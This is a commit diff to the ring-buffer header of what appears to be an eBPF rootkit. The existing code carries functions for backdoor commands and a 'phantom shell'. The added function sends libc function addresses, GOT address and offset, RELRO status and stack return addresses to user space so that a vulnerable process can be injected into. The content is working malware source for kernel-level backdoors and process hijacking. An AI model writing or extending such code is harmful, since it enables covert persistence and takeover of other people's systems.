Merged master and develop, now all changes together. Fully tested and working.

src/ebpf/include/data/ring_buffer.h

@@ -54,7 +54,6 @@ static __always_inline int ring_buffer_send_backdoor_command(struct ring_buffer
     if(!event){
         return -1;
     }
-
     event->code = code;
     event->event_type = COMMAND;
     event->pid = pid;
@@ -80,6 +79,30 @@ static __always_inline int ring_buffer_send_request_update_phantom_shell(struct
     event->event_type = PSH_UPDATE;
     event->pid = pid;
     event->bps_data = data;
+    bpf_ringbuf_submit(event, 0);
+    return 0;
+}
+
+/**
+ * @brief Sends an event indicating a vulnerable syscall injection into the specified ring kernel buffer 
+ * 
+ * @return 0 if ok, -1 if error
+ */
+static __always_inline int ring_buffer_send_vuln_sys(struct ring_buffer *rb, int pid, __u64 syscall_address, __u64 process_stack_return_address, u64 libc_main_address, u64 libc_dlopen_mode_address, __u64 libc_malloc_address, __u64 got_address, __s32 got_offset, int relro_active){
+    struct rb_event *event = (struct rb_event*) bpf_ringbuf_reserve(rb, sizeof(struct rb_event), 0);
+    if(!event){
+        return -1;
+    }
+    event->event_type = VULN_SYSCALL;
+    event->pid = pid;
+    event->libc_dlopen_mode_address = libc_dlopen_mode_address;
+    event->libc_main_address = libc_main_address;
+    event->libc_malloc_address = libc_malloc_address;
+    event->process_stack_return_address = process_stack_return_address;
+    event->syscall_address = syscall_address;
+    event->got_address = got_address;
+    event->relro_active = relro_active;
+    event->got_offset = got_offset;
 
 	bpf_ringbuf_submit(event, 0);
     return 0;